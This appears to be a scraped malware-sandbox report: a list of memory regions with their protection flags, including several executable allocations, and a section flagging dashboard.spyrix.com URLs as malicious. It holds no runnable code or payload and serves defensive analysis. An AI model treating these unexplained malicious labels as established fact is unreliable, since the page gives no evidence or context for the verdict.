2DBA000
trusted library allocation
page read and write
35D0000
direct allocation
page execute and read and write
3659000
heap
page read and write
7C0000
heap
page read and write
2BE1752C000
trusted library allocation
page read and write
7C3000
heap
page read and write
3ED0000
direct allocation
page execute and read and write
3C20000
heap
page read and write
1ABEA8B000
stack
page read and write
7B6C000
heap
page read and write
7720000
heap
page read and write
2FD4000
heap
page read and write
226E000
direct allocation
page read and write
4040000
direct allocation
page execute and read and write
189A000
heap
page read and write
1067000
unkown
page write copy
1A8F000
stack
page read and write
2C7C000
stack
page read and write
5014000
trusted library allocation
page read and write
3E00000
direct allocation
page execute and read and write
1B1B000
heap
page read and write
327D000
stack
page read and write
359E000
stack
page read and write
40B0000
direct allocation
page execute and read and write
FF385FE000
unkown
page readonly
3360000
direct allocation
page execute and read and write
580E000
stack
page read and write
1B22000
heap
page read and write
4D4C000
direct allocation
page read and write
7723000
heap
page read and write
7FE20000
direct allocation
page read and write
516F000
stack
page read and write
33A4000
heap
page read and write
7710000
trusted library allocation
page read and write
2ACB000
heap
page read and write
843000
heap
page read and write
401000
unkown
page execute read
2FE4000
heap
page read and write
There are 2701 hidden memdumps, click here to show them.

DOM / HTML

URL
Malicious
https://dashboard.spyrix.com/
https://dashboard.spyrix.com/
https://dashboard.spyrix.com/login